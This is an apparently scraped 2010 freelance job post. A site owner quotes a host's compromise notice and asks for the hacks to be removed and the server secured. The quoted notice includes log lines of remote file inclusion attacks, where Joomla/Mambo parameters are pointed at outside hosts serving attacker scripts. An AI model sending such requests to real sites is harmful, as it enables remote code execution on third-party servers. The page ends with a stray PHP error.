Tweet this
March 15th, 2010
in
Security, System Administration |
I just received this from my host:
"Your server has been compromised and used to attack and/or spam other networks. I found hacks in each of the following directories:
/home/..../public_html/modules
/home/..../public_html/language
I have disabled the malicious content and changed the permissions of each directory from 777 to 755.
and
The following files appear to be vulnerable to cross-site scripting or remote file inclusion exploits. I have included examples from the logs that show how each file is being abused. It is certainly possible that some of these examples are false positives. I have disabled these files until they can be updated and secured or removed altogether. I recommend updating any and all third-party software, especially anything that utilizes PHP:
aaaaaaaaaaaaaaa.com
/index.php?option=com_rssmosConfig.absolute.path=http://momok.org/a.gif?
bbbbbbbbbbbbbbb.com
/index.php?mosConfig_absolute_path=http://www.lovebyday.com/linux/Oid1.txt??
/database/1111111.php?whereartistlike=http://beerincooler.chat.ru/image.jpg?
/database/22222.php/index.php?mosConfig_absolute_path=http://www.lovebyday.com/linux/Oid1.txt??
cccccccccc.com
/index.php?show=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt???
/main.php?page=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt???
/photogallery/index.php?level=http://servededicado.com.br/power.txt
ddddddddddd.com
/index2.php?option=com_contentdo_pdf=1id=13%20//bug_sponsorship_list_view_inc.php?t_core_path=http://www.ursula1.de/fdh/bodo.txt???
/component/option,com_contact//index.php?option=com_contactItemid=mosConfig.absolute.path=http://demo.njipn.com/mambots/system/idtasikfeel.txt??
eeeeeeeeeeee.com
/index.php?cp=http://ninaru.hut2.ru/images/cs.txt?"
I need these hacks/exploits found and removed. And I need my server secured properly.
Please only bid if you are honest, experienced and well-reviewed.
Fatal error: Call to undefined function similar_posts() in
/home/francz00/domains/rsslance.com/public_html/wp-content/themes/Graphite/single.php on line
43